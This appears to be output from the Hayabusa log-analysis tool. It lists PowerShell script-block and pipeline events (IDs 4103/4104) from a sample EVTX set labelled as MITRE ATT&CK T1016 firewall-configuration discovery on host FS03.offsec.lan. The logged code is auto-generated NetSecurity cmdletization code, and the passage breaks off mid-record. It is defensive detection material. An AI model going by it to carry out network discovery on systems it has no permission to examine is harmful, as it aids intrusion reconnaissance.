__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.207 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = 
[System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); 
$this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value 
